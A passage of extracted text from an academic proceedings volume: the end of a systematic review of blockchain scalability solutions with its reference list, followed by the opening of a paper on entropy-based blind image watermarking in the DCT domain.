Multichain Private Main chain, PoW – – 2000–2500
Off-chain tps
Quorums Private – PoS PBFT – –
Slimcoin Public/Private – PoB – – –
Tendermint Private/Consortium Single chain PoC – – 10,000 tps
A Systematic Review of Blockchain Technology to Find Current … 21

4.5 Other Latest Protocols/Solutions to Scale Blockchain

Block propagation time is closely related to network bandwidth. Node with higher
bandwidth gets a block sooner than a node with less bandwidth. The node with 500
Mbps bandwidth takes average 1.55 s to receive a block while node with 256 kbps
bandwidth takes 71.71 s on average. To optimize blockchain system, better neighbor
selection algorithm is used to reduce the block propagation time. The block propa-
gation time is the time needed for a miner to receive the new block. In Fastchain [23]
(a protocol to scale blockchain), lower bandwidth node sent block to higher band-
width node and then higher bandwidth node sent block to rest of the nodes. Miners
with limited bandwidth favor the node with higher bandwidth and disconnected them-
selves. Fastchain implementation is divided into bandwidth monitoring and neighbor
update phase. In bandwidth monitoring phase, each node maintains a latest band-
width table. In neighbor update phase, each miner periodically refreshes its neighbor
connections. NS3 simulator is used for experimentation, and in result, it increases
effective block rate (number of blocks added to chain) up to 40% and throughput
by 20–40% compared to bitcoin. This solution has some limitations. Each network
node has to maintain latest bandwidth table which periodically refreshes neighbor
connections for latest update. Miners with limited bandwidth are always dependent
on higher bandwidth node.
In PoW, if two miners solve the hash at the same time, in that case, blockchain
will add the block which is accepted by major node (at least 51%). Other miner who
put its resources to mine a block will be wasted. To overcome this problem, solo
mining is replaced by parallel mining [24]. Parallel mining required a manager to
ensure that no two miners use the same nonce value. The manager will distribute the
transaction hash and groups of nonces to each active miner. A miner who solves a
block would become a manager. GX library of Golang is used for experimentation,
and result shows the improvement in scalability of PoW up to 34% compared to
present situation. Some limitations show that miner with more processing power
will have the ability to calculate more nonce value, and it increases the probability
of becoming a manager. All miners have to depend on the manager to obtain a
transaction hash and nonces. If the manager goes offline or fails to respond, there
can be a single point of failure arise in this solution.
Sharding technique has three components: (1) assign node into shard; (2) intra-
shard consensus protocol; and (3) cross-shard transaction (to remove double-
spending problem). OmniLedger [25] has modified the Elastico sharding protocol
and tried to reduce the limitations of Elastico protocol. OmniLedger adopt unspent
transaction output (UTXO) model same as bitcoin. By combining ByzCoin and
PBFT, it introduced ByzCoinX consensus for shards. It combines RandHound with
Algorand that periodically rotates the set of validators. The role of validators is to
assign and verify the task of shards. OmniLedger solution also introduced Atomix
protocol that uses two-phase client-driven “lock/Unlock” for commit or rejection
of proof. OmniLedger uses anti-Sybil attack method to automatically handle cross-
shard transaction. Its dataset contains first 10,000 blocks of bitcoin blockchain. For
22 B. K. Chauhan and D. B. Patel

experimentation, 60 physical machines each of which has an intel E5-2420 v2 CPU


and 24 GB RAM is used. This protocol can process 6000 tps (practically 5000) and
takes 20 s confirmation time with 1800 nodes. In OmniLedger, any user interacts
with other users and actively participates in the cross-shard transaction which is very
difficult to satisfy lightweight users.
A scale-out blockchain for value transfer with spontaneous sharding [26] solution
is completely novel-based solution based on some assumptions. It contains individual
chain and main chain in its off-chain architecture. The value transfer ledger(VTL)
model passes values from one node to another node. The proof is associated with
each piece of value, as value moves from one node to another node eventually size of
proof will be increased. The phases of this solution: (1) Individual chains contain their
own transactions in a first-in-first-out order. (2) Main chain using PBFT consensus
protocol. Each verified block from individual chain has signature of corresponding
node called abstract and also contains their proofs. (3) Validation scheme for valida-
tion of the transaction. In validation phase, transaction is valid or not depends on the
collected proofs. This solution is totally based on theory, and it assumes that each
node is honest and cooperative. This designed is useful for only micropayments-based
application.
A scalable and extensible blockchain [27] system uses multiple chains in sharding
method for large-scale business applications. A large number of transactions on
single chain degrade the system performance and also create traffic in the system.
It includes single main chain with set of subchains and for communication between
chains value swap layer is used. The aim of value swap layer is to circulate the assets
among different chains. The subchain node handles the large number of services
like exchange transaction, e-commerce, supply chain, etc. They build Merkle tree by
maintaining transactions and blocks. It submits Merkle tree root hash, timestamp,
and metadata to the mainchain. The mainchain validators verify the signature and
data received from subchain. The mainchain accepts the verified blocks and adds
into the permanent chain.
Each network node has its own copy of ledger in blockchain-based system. The
verified blocks are added into the chain, and the size of chain becomes larger day
by day. Because of more space utilized by ledger, it takes more time in verification
process that affects blockchain scalability. For smoothing the verification process and
space saving, this solution presents the idea of summary blocks and compressing
the summary blocks [28]. This solution uses block summarization algorithm and
deflate compression algorithm. For experimentation, 200,000–250,000 of bitcoin
blockchain data are used. Using this solution, network nodes contain limited data
size, and result phase shows improvement in transaction verification process. During
implementation, this method faces several problems, and there is no standard for
block summarization and block compression which is able to maximize the value of
space saving.
Each shard is a separate network node in the sharding method. This solution adds
“Inspector node” [29] functionality with validators node which makes sharding-
based blockchain more effective and secured. If an attacker takes over majority of
the shards, he/she can submit malicious transactions in shard that added into the main
A Systematic Review of Blockchain Technology to Find Current … 23

chain. The inspector node investigates such malicious activities going in the shard and
eliminates it. All the nodes reshuffle by random sampling method if any suspicious
activity found by an inspector node. The fund involved in malicious transaction is
transferred to the inspector node. This theory-based solution provides better security
of sharding-based blockchain applications.
The cross-shard transaction is the biggest challenge faced by sharding method
which increases the confirmation time. All shards that involve a cross-shard transac-
tion need to execute multiple-phase protocols to confirm the transaction authenticity.
Optchain [30] gives the solution to improve cross-shard transaction process. It opti-
mizes the placement of transactions into shard by random placement strategy and
modifies the simple payment verification protocol. PageRank analysis is used to place
transactions into the shard. The dataset contains first 10 million bitcoin transactions
(10,000,000). OverSim framework to simulate a system on OMNeT++ 4.6 is used
for experimentation. This protocol can process 6000 tps with 16 shards and takes
10.5 s confirmation time. This solution reduces the latency by 93% and increases the
throughput by 50% in comparison with the OmniLedger. Optchain compares with
only OmniLedger sharding protocol and predicts that it will give same result when
compared with other sharding protocols. It is implemented into existing wallet soft-
ware so it is useful for only payment module. This protocol improves cross-shard
transaction process. Remaining core component of sharding protocol: (1) assign
nodes into shard and (2) intra-shard consensus protocol are not included.
Ethereum introduced the concept of smart contract and decentralized applications
(Dapps). The on-chain execution of smart contract increases confirmation time that
degrades the system performance. This solution tries to execute smart contract in
on-chain and off-chain phase to check the performance of the system. This uses
hybrid-on/off-chain computation model, and it has plug-and-play solution approach
that is compatible with existing smart contract systems. Solidity language is used to
write smart contract. Kovan test network which is Ethereum’s official test network is
used for experimentation. This solution assumes that all the network node is honest
[31].
Hyperledger Fabric platform supports private and consortium blockchain network.
Hyperledger Fabric v.1.4 (latest version) [32] allows developers to select consensus
interface to provide an ordering service. The consensus interface is either Solo or
Kafka. It supports either LevelDB or CouchDB as state database options. Smart
contract can be written in language like Golang, JavaScript, and Java program-
ming. This study used solo (only one orderer) ordering service and CouchDB in the
deployment model. Smart contracts are written in JavaScript language. The entire
deployment installs and runs on the Linux–Ubuntu operating system. 1000 and 5000
transactions are generated for first and second round, respectively, for dataset. The
blockchain benchmark tool, Hyperledger Caliper, is used to evaluate result. Result of
this case study shows that Hyperledger Fabric handles up to 100,000 nodes (partic-
ipants) on the selected AWS EC2 instance. AWS is Amazon Web Services that
provides virtual machine on rent, and users can implement their applications on it.
24 B. K. Chauhan and D. B. Patel

The Hyperledger Fabric v.1.4 can process up to 200 tps with 0.01–0.16 s confirma-
tion time. The sharding protocol SSChain can handle more than 6500 tps with 1800
network nodes [33].
Proper partitioned is the first step in sharding technique, and if design of parti-
tioned is not systematic, the performance of system becomes degraded instead of
improvement. Ethereum blockchain is taken as graph to evaluate the partition. For
evaluation, five methods Hashing, Kernighan–Lin algorithm, METIS, R-METIS, and
TR-METIS are used. The matrices used for performance measurement are balance of
shards, transactions taking part in multiple shards and the amount of data that would
be relocated across shards upon repartitioning of the graph. The result shows that the
Hashing and Kernighan–Lin algorithm perform better partition. If sharding method
is implemented into Ethereum, it would change the design of blockchain [36]. Table
2 summarizes all the latest solutions with their used dataset, experimental device,
size of network, and result after evaluation.

5 Future Scope of Blockchain Technology

5.1 When Blockchain Technology Will be Combined


with Other Technology

The Internet of things (IoT) got more attention by academia, society, and industries.
As by using IoT, so many business processes, human activities, and services are
improved. It has some challenges which needs to be solved such as trust, security, and
overhead. It is expected that IoT ecosystem would become smarter and more efficient
using blockchain technology. IoT produces large number of data, and blockchain
can process limited number of transactions; so, in present situation, it is difficult for
blockchain to process the data produced by IoT [37]. Blockchain has enough capacity
to store important data in distributed and secure manner. Blockchain also gives surety
that data is original as a result it gives accurate data analysis if combined with big
data analysis [38]. Industrial development is dependent on reliable partnerships but its
growth is hindered due to increasing cybercrime and fraud. Blockchain can be more
useful to reduce these kinds of challenges. The industrial development would become
more improve by merging blockchain technology with IoT and cloud technology [5].

5.2 Benefits that Blockchain Technology and Smart Contract


Could Bring to All Sectors

Blockchain provides distributed, secured, and traceable environment, whereas smart


contract provides self-execution. Merging both can solve many problems faced by
A Systematic Review of Blockchain Technology to Find Current … 25

Table 2 Performance summary of latest solutions for blockchain scaling


Solution Dataset Experimental Network Transactions Confirmation Ref
device node per second time
Elastico – Amazon EC2 1600 1600 tps 711 s [34]
for network nodes
setup
FastChain – NS3 – Improves – [23]
simulator the
throughput
by
20%–40%
compared to
bitcoin tps
A parallel – GX library of – Increase – [24]
proof of work Golang 34%
compared to
bitcoin
OmniLedger First 10,000 60 physical 1800 6000 tps 20 s [25]
blocks of the machines nodes
bitcoin
blockchain
Block 200,000–250,000 – – The – [28]
summarization of bitcoin transaction
and blockchain data verification
compression process
becomes
improved
OptChain First 10 million OverSim – 6000 tps 10.5 s [30]
bitcoin framework of
transactions OMNeT++
(10,000,000) 4.6
On/Off-chain – Ethereum – – – [31]
smart official test
contracts network
design Kovan
Hyperledger 1000 and 5000 AWS EC2 100,000 200 tps 0.01 to 0.16 s [32]
fabric v.1.4 transactions instance for nodes
(latest version) generated for network
first and second setup and
round, Hyperledger
respectively Caliper for
result
evaluation
SSChain – 60 physical 1800 6500 tps – [33]
machines nodes
Rapidchain About 5 million Go2 used to 4000 7380 tps 8.7 s [35]
transactions evaluate nodes
processed performance
26 B. K. Chauhan and D. B. Patel

the real world. Smart contract is lines of code stored in blockchain and automati-
cally executes (self-verifying, self-executing, and tamper-resistant) when conditions
on that are satisfied. It is event-driven program that runs on blockchain platform,
and it does not need any kind of monitoring. The consensus protocol is used to
run sequence of events included in the smart contract. There are different kind of
consensus protocols introduced according to requirement of application, and in future
it may increase. The benefits of smart contract are real time, accurate, lower cost,
and time saving. Any application can be built without requirement of third party
by combining blockchain and smart contract and that is also reliable and secured.
Some use cases are supply chain, Internet of things, healthcare systems, digital right
management, insurance, financial sectors, and real estate [39]. Smart contract is in
its early stage, and before implementation, it is necessary to solve challenges like
scalability, flexibility, and security.

5.3 Important Points Preventing Growth of Blockchain


Technology

The cryptocurrency is not limited to bitcoin and Ethereum-based Ether, and in present
situation, hundreds of cryptocurrencies are introduced. It is necessary to design
blockchain testing mechanism to test the quality of different blockchain. The testing
mechanism could include standardization phase and testing phase. The standardiza-
tion phase would test the quality of blockchains. The new blockchain could actually
work as of the developer describe would be checked during standardization phase. In
testing phase, different criteria are used to test the performance of blockchain [38].
Implementation of blockchain has to give surety of security, privacy, high throughput,
and data integrity. However, these qualities set up a lot of challenges like scalability,
interoperability, cost-effectiveness, authentication, privacy, security that need to be
addressed [40]. Blockchain technology has many good features such as trusted, trans-
parency, automation, anonymity, security, auditability, and decentralization [11, 38].
Despite all these good qualities, its development is slowly growing due to scala-
bility problem. There are many studies and solutions conducted by researcher on
blockchain scalability. Nevertheless, some solutions give answer for only scalability
problem but is not covering decentralization and security part of blockchain [11].
Open-source platforms, Ethereum and Hyperledger, are helpful to build decentralized
application with public and private network type, respectively. Blockchain provides
security as it uses peer-to-peer network, distributed ledger, and asymmetric encryp-
tion. By implementing this technology, many sectors like financial sector, healthcare
service sector, mobile networking, and other sectors can be converted into secured
decentralized system from existing centralized system. The industries and business
sectors are interested in blockchain technology which can improve their existing
system [41, 42]. Despite the great curiosity of the business sector to implement this
technology into their business processes, insufficient answers of effectiveness of
A Systematic Review of Blockchain Technology to Find Current … 27

technology in practice prevent them to proceed further. Limited number of solutions


for blockchain scalability and security also prevent them to adopt the blockchain
technology.

5.4 SWOT Analysis of Blockchain Technology

SWOT analysis used to show strength, weakness, opportunities, and threats side
of the blockchain technology. Fully transparent, without support of middleman,
traceable, tamper-free, higher efficient, lower risk, lower cost, decentralized,
distributed, immutable, secured reliable, accurate, trusted, and auditable are strength
of blockchain technology. Scalability, storage issue, cybersecurity, not fully devel-
oped, lack of standards, and lack governance are weaknesses. Automation, improve-
ment in supply chain, business process optimization, improve customer satisfaction
by transparency, innovate every industry, opportunities in IoT are its opportuni-
ties. It requires more research study that is included in threats of this technology
[43]. Research community needs to make detailed study and analysis in context of
scalability and security for rapid development in technological level [41].

6 Conclusion

After reviewing all the problems and solutions, we can come to the conclusion that
one needs to simulate the existing technology and check the performance for the
same. It needs to research the scalability challenge by changing conscience and
creating such smart contract or protocol level changes into technology which leads
to scale the limitation of the blockchain. Achieving this technology gives robust
application in many domains.

References

1. Nakamoto, S. (2008). Bitcoin: A peer-to-peer electronic cash system. https://bitcoin.org/bit


coin.pdf
- S. (2018). Blockchain technology, bitcoin, and Ethereum:
2. Vujičić, D., Jagodić, D., & Randić,
A brief overview. In 2018 17th International Symposium Infoteh-jahorina (infoteh) (pp. 1–6).
IEEE.
3. Wood, G. (2014). Ethereum: A secure decentralised generalised transaction ledger. Ethereum
Project Yellow Paper, 151(2014), 1–32.
4. Mahmood, B. B., Muazzam, M., Mumtaz, N., & Shah, S. H. (2019). A technical review on
blockchain technologies: Applications, security issues & challenges. International Journal of
Computing and Communication Networks, 1(1), 26–34.
28 B. K. Chauhan and D. B. Patel

5. Ahram, T., Sargolzaei, A., Sargolzaei, S., Daniels, J., & Amaba, B. (2017). Blockchain
technology innovations. In 2017 IEEE technology & engineering management conference
(TEMSCON) (pp. 137–141). IEEE.
6. Ismail, L., & Materwala, H. (2019). A review of blockchain architecture and consensus
protocols: Use cases, challenges, and solutions. Symmetry, 11(10), 1198.
7. Lopes, J., & Pereira, J. L. (2019). Blockchain projects ecosystem: A review of current technical
and legal challenges. In World Conference on Information Systems and Technologies (pp. 83–
92). Cham: Springer.
8. Puthal, D., Malik, N., Mohanty, S. P., Kougianos, E., & Das, G. (2018). Everything you
wanted to know about the blockchain: Its promise, components, processes, and problems.
IEEE Consumer Electronics Magazine, 7(4), 6–14.
9. Mechkaroska, D., Dimitrova, V., & Popovska-Mitrovikj, A. (2018). Analysis of the possibil-
ities for improvement of Blockchain technology. In 2018 26th Telecommunications Forum
(TELFOR) (pp. 1–4). IEEE.
10. Executive Summary. (2019). NASSCOM Avasant India Blockchain Report.
11. Xie, J., Yu, F. R., Huang, T., Xie, R., Liu, J., & Liu, Y. (2019). A survey on the scalability of
blockchain systems. IEEE Network, 33(5), 166–173.
12. Benčić, F. M., & Žarko, I. P. (2018). Distributed ledger technology: Blockchain compared to
directed acyclic graph. In 2018 IEEE 38th International Conference on Distributed Computing
Systems (ICDCS) (pp. 1569–1570). IEEE.
13. Croman, K., Decker, C., Eyal, I., Gencer, A. E., Juels, A., Kosba, A., & Song, D. (2016). On
scaling decentralized blockchains. In International conference on financial cryptography and
data security (pp. 106–125). Berlin: Springer.
14. Zheng, P., Zheng, Z., Luo, X., Chen, X., & Liu, X. (2018). A detailed and real-time perfor-
mance monitoring framework for blockchain systems. In: 2018 IEEE/ACM 40th International
Conference on Software Engineering: Software Engineering in Practice Track (ICSE-SEIP)
(pp. 134–143). IEEE.
15. Zhou, Q., Huang, H., Zheng, Z., & Bian, J. (2020). Solutions to scalability of blockchain: A
survey. IEEE Access, 8, 16440–16455.
16. Kim, S., Kwon, Y., & Cho, S. (2018). A survey of scalability solutions on blockchain. In 2018
International Conference on Information and Communication Technology Convergence (ICTC)
(pp. 1204–1207). IEEE.
17. Holotescu, V., & Vasiu, R. (2020). Challenges and emerging solutions for public
blockchains. BRAIN: Broad Research in Artificial Intelligence and Neuroscience, 11(1), 58–83.
18. Guo, H., Zheng, H., Xu, K., Kong, X., Liu, J., Liu, F., & Gai, K. (2018). An improved consensus
mechanism for blockchain. In International Conference on Smart Blockchain (pp. 129–138).
Cham: Springer.
19. Salah, K., Rehman, M. H. U., Nizamuddin, N., & Al-Fuqaha, A. (2019). Blockchain for AI:
Review and open research challenges. IEEE Access, 7, 10127–10149.
20. Moezkarimi, Z., Abdollahei, F., & Arabsorkhi, A. (2019). Proposing a framework for evalu-
ating the blockchain platform. In 2019 5th International Conference on Web Research (ICWR)
(pp. 152–160). IEEE.
21. Clincy, V., & Shahriar, H. (2019). Blockchain development platform comparison. In 2019
IEEE 43rd Annual Computer Software and Applications Conference (COMPSAC) (Vol. 1,
pp. 922–923). IEEE.
22. Saraf, C., & Sabadra, S. (2018). Blockchain platforms: A compendium. In 2018 IEEE
International Conference on Innovative Research and Development (ICIRD) (pp. 1–6). IEEE.
23. Wang, K., & Kim, H. S. (2019). FastChain: Scaling blockchain system with informed neighbor
selection. In 2019 IEEE International Conference on Blockchain (Blockchain) (pp. 376–383).
IEEE.
24. Hazari, S. S., & Mahmoud, Q. H. (2019). A parallel proof of work to improve transaction speed
and scalability in blockchain systems. In 2019 IEEE 9th Annual Computing and Communication
Workshop and Conference (CCWC) (pp. 0916–0921). IEEE.
A Systematic Review of Blockchain Technology to Find Current … 29

25. Kokoris-Kogias, E., Jovanovic, P., Gasser, L., Gailly, N., Syta, E., & Ford, B. (2018).
Omniledger: A secure, scale-out, decentralized ledger via sharding. In 2018 IEEE Symposium
on Security and Privacy (SP) (pp. 583–598). IEEE.
26. Ren, Z., Cong, K., Aerts, T., de Jonge, B., Morais, A., & Erkin, Z. (2018). A scale-out blockchain
for value transfer with spontaneous sharding. In 2018 Crypto Valley Conference on Blockchain
Technology (CVCBT) (pp. 1–10). IEEE.
27. Yu, Y., Liang, R., & Xu, J. (2018). A scalable and extensible blockchain architecture. In 2018
IEEE International Conference on Data Mining Workshops (ICDMW) (pp. 161–163). IEEE.
28. Nadiya, U., Mutijarsa, K., & Rizqi, C. Y. (2018). Block summarization and compression
in bitcoin blockchain. In 2018 International Symposium on Electronics and Smart Devices
(ISESD) (pp. 1–4). IEEE.
29. Chauhan, A., Malviya, O. P., Verma, M., & Mor, T. S. (2018). Blockchain and scala-
bility. In 2018 IEEE International Conference on Software Quality, Reliability and Security
Companion (QRS-C) (pp. 122–128). IEEE.
30. Nguyen, L. N., Nguyen, T. D., Dinh, T. N., & Thai, M. T. (2019). OptChain: optimal transactions
placement for scalable blockchain sharding. In 2019 IEEE 39th International Conference on
Distributed Computing Systems (ICDCS) (pp. 525–535). IEEE.
31. Li, C., Palanisamy, B., & Xu, R. (2019). Scalable and privacy-preserving design of on/off-chain
smart contracts. In 2019 IEEE 35th International Conference on Data Engineering Workshops
(ICDEW) (pp. 7–12). IEEE.
32. Kuzlu, M., Pipattanasomporn, M., Gurses, L., & Rahman, S. (2019). Performance analysis of
a hyperledger fabric blockchain framework: Throughput, latency and scalability. In 2019 IEEE
International Conference on Blockchain (Blockchain) (pp. 536–540). IEEE.
33. Chen, H., & Wang, Y. (2019). SSChain: A full sharding protocol for public blockchain without
data migration overhead. Pervasive and Mobile Computing, 59, 101055.
34. Luu, L., Narayanan, V., Zheng, C., Baweja, K., Gilbert, S., & Saxena, P. (2016). A secure
sharding protocol for open blockchains. In Proceedings of the 2016 ACM SIGSAC Conference
on Computer and Communications Security (pp. 17–30).
35. Zamani, M., Movahedi, M., & Raykova, M. (2018). Rapidchain: Scaling blockchain via
full sharding. In Proceedings of the 2018 ACM SIGSAC Conference on Computer and
Communications Security (pp. 931–948).
36. Fynn, E., & Pedone, F. (2018). Challenges and pitfalls of partitioning blockchains. In 2018 48th
Annual IEEE/IFIP International Conference on Dependable Systems and Networks Workshops
(DSN-W) (pp. 128–133). IEEE.
37. Cao, B., Li, Y., Zhang, L., Zhang, L., Mumtaz, S., Zhou, Z., & Peng, M. (2019). When Internet of
Things meets blockchain: Challenges in distributed consensus. IEEE Network, 33(6), 133–139.
38. Zheng, Z., Xie, S., Dai, H., Chen, X., & Wang, H. (2017). An overview of blockchain tech-
nology: Architecture, consensus, and future trends. In 2017 IEEE international congress on
big data (BigData congress) (pp. 557–564). IEEE
39. Mohanta, B. K., Panda, S. S., & Jena, D. (2018). An overview of smart contract and use cases in
blockchain technology. In 2018 9th International Conference on Computing, Communication
and Networking Technologies (ICCCNT) (pp. 1–4). IEEE.
40. Koteska, B., Karafiloski, E., & Mishev, A. (2017). Blockchain implementation quality chal-
lenges: A literature. In SQAMIA 2017: 6th workshop of software quality, analysis, monitoring,
improvement, and applications (pp. 11–13).
41. Sandner, P., & Schulden, P. M. (2019). Speciality grand challenges: Blockchain. Front
Blockchain, 2, 1.
42. Lu, Y. (2019). The blockchain: State-of-the-art and research challenges. Journal of Industrial
Information Integration, 15, 80–90.
43. Niranjanamurthy, M., Nithya, B. N., & Jagannatha, S. (2019). Analysis of blockchain
technology: Pros, cons and SWOT. Cluster Computing, 22(6), 14743–14757.
Secured Blind Image Watermarking
Using Entropy Technique in DCT
Domain

Megha Gupta and R. Rama Kishore

Abstract In the current situation, we can communicate sound, video and pictures
with the utmost ease. However, security and copyright of the media turned into a
significant issue, so a rising method, known as digital watermarking, is utilized for
shielding digital media from counterfeiting and unapproved use. In this paper, a
blind image watermarking technique is presented, which uses the entropy method
and watermark encryption with the predefined mathematical function to make the
process more robust, secure and imperceptible. A watermark is inserted in the DCT
domain, which facilitates robustness in bandpass filtering actualized channels. To
provide objective evidence of the performance, the performance measures peak signal
to noise ratio (PSNR) and normalized correlation (NC) are used. The method can
achieve greater than 40 dB PSNR value, and the NC values are in the range of 0.9–1.
The proposed technique has been actualized in MATLAB 2020a, and on testing, under
various attacks, the technique achieved a great balance between imperceptibility and
robustness.

Keywords Blind image watermarking · Secure watermarking · Entropy · Discrete


cosine transform · Encryption · PSNR · NC · Robustness · Imperceptibility

1 Introduction

Digital Watermarking helps to protect digital media from counterfeiting and inap-
propriate use of data [1–3]. This technique has turned out to be successful, using the

M. Gupta (B) · R. Rama Kishore


University School of Information and Communication Technology, Guru Gobind Singh
Indraprastha University, Delhi, India
e-mail: megha.phd160.usict2019@ipu.ac.in
R. Rama Kishore
e-mail: rama.kishore@ipu.ac.in
M. Gupta
Noida Institute of Engineering and Technology, Gr. Noida, U.P, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 31
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_3
32 M. Gupta and R. Rama Kishore

watermarking technique which has helped in reducing the unfair distribution of the
data and violation of the copyright act [4, 5]. In this technique, we are able to get
a watermarked image by embedding secret information called a watermark on the
cover image [6, 7].
Earlier, the algorithms were used to embed and extract watermarks through spatial
approaches, like LSB (least significant bits) watermarking technique [8–10]. During
the process, the LSB of the cover image is used for watermarking. Algorithms based
on this method are not robust enough and can be disclosed through mathematical
analysis. Other refined algorithms embed watermark bits in frequency domains of the
image; for instance, [11–13] placed the watermark in their method at the frequency
spectrum to achieve high security and high reliability [14–16]. The algorithm is given
by Shih [17] which has increased the capacity of watermark’s frequency domain and
at the same time, it maintained the imperceptibility. Savakar [18] tried to maintain
the cover image statistics by using an embedding technique.
In the proposed watermarking technique, Shannon’s Entropy is used to find the
location which is more robust for inserting the watermark bits defined by Garg and
Kishore [19]. As the introduced algorithm is blind, the actual watermark and host
image are not required at the time of extraction. The discrete cosine transform is used
for embedding the domain.
The paper beneath is presented in multiple sections. Section 2 depicts a concise
summary of the work published in the domain of advanced digital watermarking
technique. Section 3 addresses the submitted digital image watermarking method.
Section 4 includes experimental results of the proposed work, and experimental
results are analysed to discover similarities and differences with the existing works.
Section 5 takes in the recapitulation of the proposed work.

2 Related Work

In the proposed work, DCT technique with entropy is used, so this section assesses
the work done in the field of digital watermarking using entropy methodology. N.
A. Loan [20] gave a digital image watermarking technique dependent on entropy to
enhance imperceptibility and robustness. One low-frequency watermark and another
high-frequency watermark is embedded in this technique [21, 22]. The region with
great entropy value is detected in the host image for embedding the watermark. DWT
and SVD put into application for inserting the watermark [23–26]. Yang et al. [27]
presented an information-masking model using the idea of entropy to advance the
robustness and imperceptibility in the temporal domain and spatial spectrum. Mehta
et al. [28] introduced an image watermarking method using block entropy where the
block of high entropy is used for inserting the watermark using LSB substitution
method.
Deljavan et al. [29] proposed a blind, HVS-based, transparent, scalable water-
marking algorithm, robust against scalable image coding based on DWT. The selected
Secured Blind Image Watermarking Using Entropy Technique in DCT Domain 33

coefficients in the high-frequency sub-bands are chosen for embedding the water-
mark upon analysing luminance, texture and contrast. Furthermore, selection of the
coefficient takes place through entropy and amplitude analysis. Application of multi-
levels of DWT on the watermark helps in scalable [30–32]. A representation of it,
and the host image has selected coefficients with DWT sub-bands for inserting the
decomposed watermark sub-bands [33, 34].
Garg and Kishore [35] applied entropy method to optimize the results; the water-
mark bits are embedded in the blocks of low entropy instead of embedding them
in the complete image. Experimental results show that their technique suffices both
the imperceptibility and robustness. Mohammed et al. [36] used HVS-based entropy
parameter for each block with DWT and SVD domain. The method asserts that
embedding watermark in these particular blocks provides more imperceptible and
robust results [37, 38]. Mehta et al. [39] adopted fuzzy entropy to embed the water-
mark bits. Fuzzy entropy is used to abandon the superfluous and inappropriate blocks
obliquely [40], and it helps to reduce the dimensionality of the watermark embedding
technique, and this provides better robustness property [41, 42].
Based on the papers mentioned above, which is concerned to watermark a
greyscale image, a block entropy-based digital watermarking technique is used. The
introduced technique inserts the watermark in selected segments of the greyscale
image instead of embedding the watermark in the complete host image. Segments
are selected based on entropy value. Watermark is inserted in the chosen segments by
using two DCT coefficients, it is required that the variation of these coefficients needs
to be fair and should be in the region of low frequency. The robustness increases with
the distance [43]. Watermark image is encrypted by bit-xor encryption technique,
and this increases the security because the attacker would not be able to draw out
the original watermark from the watermarked image [44]. Encrypted watermark is
placed in selected DCT coefficients such that watermark strength is adaptive for each
block which improves the watermark imperceptibility property.

3 Proposed Digital Image Watermarking Algorithm

The proposed digital image watermarking algorithm utilizes the concept of water-
mark encryption, entropy and DCT for inserting the watermark in the host picture.
DCT happens to be utilized to transform the image of the spatial domain over to
the frequency domain through the means of transforming the image in the form of
a cosine wave series at different frequencies. To optimize the results, the entropy of
every block is calculated. Furthermore, blocks are then arranged depending upon the
entropy values. The blocks with less entropy are used for embedding the watermark
[45]. Here, the method is adaptive as the embedding strength for each block changes
with the characteristics of the blocks. To attain more security, watermark encryption
is done using the predefined mathematical function. In this segment, the submitted
digital image watermarking technique is defined. It comprises the algorithm for
embedding the watermark which is covered in Sect. 3.1. Furthermore, algorithm for
34 M. Gupta and R. Rama Kishore

Fig. 1 Proposed watermark embedding model

extracting the watermark is covered in Sect. 3.2, and their block diagrams are shown
in Figs. 1 and 2, respectively.

3.1 Proposed Watermark Embedding Algorithm

Step 1. Read the host image IMG and watermark image WM.
Step 2. Encrypt watermark with the predefined mathematical function.
The objective is to secure the watermark from attackers. It is arduous for attackers to
obtain the original watermark. The process of encryption is done using the predefined
mathematical function.
Step 3. Divide the Image IMG into non-overlapped 8 × 8 blocks.
Step 4. Calculate the Entropy of each block.

The concept of Entropy Technique


The term entropy was given by Shanon in 1948. He defined an image with higher
entropy has more information, higher the entropy—higher the information. Entropy
Secured Blind Image Watermarking Using Entropy Technique in DCT Domain 35

Fig. 2 Proposed watermark extraction model

is the average of the uncertainty value in an image. The Shannon entropy of random
variable X is given by the following formula, where p(x) is the probability mass
function, whose value lies between 0 and 1. The value of −log p(x) represents the
information related to the single bit x. If the probability of the pixel is zero, then it
will not contribute to the entropy calculation, as 0 log 0 = 0. The higher the value of
entropy, the more information it stores.

H (X ) = − p(x) log p(x) (1)
x∈X

This formula in Eq. 1 is used to find the entropy of each block.


Step 5. Sort the blocks based on the entropy value in ascending order.
The blocks with low variations in the frequency are needed for embedding the water-
mark bits. The blocks in the DCT coefficients are arranged in the order of increasing
variations; the starting blocks have the least variation, and the last block has the most
variation.
The watermark bits are embedded in the blocks possessing low entropy [46]
because they hold the capacity of withstanding under attacks; this results in lesser
distortion for low entropy blocks.
36 M. Gupta and R. Rama Kishore

Step 6. The DCT value is calculated for each block and watermark is embedded in
two selected coefficients “bi” and “bj”.
Step 7. Compute watermark strength.
For embedding the watermark, its strength is adjusted on the basis of the mean of the
blocks. This keeps the strength of the watermark related to the local characteristics
of the block. Furthermore, it also helps to embed the watermark with a lesser impact
on the imperceptibility of the image.
The watermark strength Alpha is computed as the mean of the selected blocks.
n
dct(i, j)
Alpha = i=1
(2)
n

where “n” is block size, i and j are the positions of DCT coefficients in a block of
size 8 × 8.
Step 8. Embed watermark bits.
If watermark bit is one, then modify the selected coefficients in accordance with Eq. 3.
And if watermark bit is zero, then modify the selected coefficients in accordance with
Eq. 4.

bi = bi + Alpha ∗ μ
bj = bj − Alpha ∗ μ (3)

bi = bi − Alpha ∗ μ
bj = bj + Alpha ∗ μ (4)

Here “bi” and “bj” are the chosen DCT coefficients, μ is strength multiplier. When
wi = 1, watermark strength is added to the coefficient “bi” and subtracted from “bj”.
Furthermore, when wi = 0, watermark strength is subtracted from the coefficient
“bi” and added to “bj”. This makes “bi” greater if watermark bit is one and “bj”
greater if watermark bit is zero.
Step 9. Generate the Watermarked Image.
Combine all 8 × 8 blocks after modifications in the bits and apply inverse DCT to
generate the watermarked image.

3.2 Proposed Watermark Extraction Algorithm

Step 1: Take the watermarked image as an input.


Step 2: Divide the watermarked image WIMG into non-overlapped 8 × 8 blocks.
Secured Blind Image Watermarking Using Entropy Technique in DCT Domain 37

Step 3: Calculate entropy of each block by applying the formula used for
embedding watermark, as presented in Eq. 1.
Step 4: Sort the blocks based on the entropy value in ascending order, to select
the blocks with low entropy value.
Step 5: Apply DCT transformation on each block using Eq. 2.
